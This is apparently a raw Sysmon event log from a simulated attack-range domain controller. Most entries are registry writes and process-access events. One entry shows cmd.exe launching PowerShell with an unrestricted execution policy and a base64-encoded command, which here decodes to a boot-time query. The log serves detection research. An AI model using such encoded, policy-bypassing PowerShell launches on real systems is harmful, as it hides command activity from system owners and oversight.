13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000002875Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000002874Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000002873Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-935 13241300x80000000000000002872Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002897Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:53.210{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6cd69-0x90699981) 13241300x80000000000000002910Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002909Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002908Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000002907Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000002906Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000002905Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000002904Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000002903Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000002902Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000002901Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000002900Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000002899Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-935 13241300x80000000000000002898Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:54.319{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000002966Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8575-5FCF-8600-000000009101}46284648C:\Windows\system32\conhost.exe{10ACEC4A-8575-5FCF-8800-000000009101}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002965Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002964Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002963Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002962Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002961Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002960Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002959Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002958Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002957Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002956Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002955Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8575-5FCF-8800-000000009101}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002954Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002953Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8575-5FCF-8700-000000009101}46924696C:\Windows\system32\cmd.exe{10ACEC4A-8575-5FCF-8800-000000009101}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002952Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.983{10ACEC4A-8575-5FCF-8800-000000009101}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8575-5FCF-22B3-050000000000}0x5b3220HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8575-5FCF-8700-000000009101}4692C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x80000000000000002951Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002950Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8575-5FCF-8600-000000009101}46284648C:\Windows\system32\conhost.exe{10ACEC4A-8575-5FCF-8700-000000009101}4692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002949Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002948Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002947Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 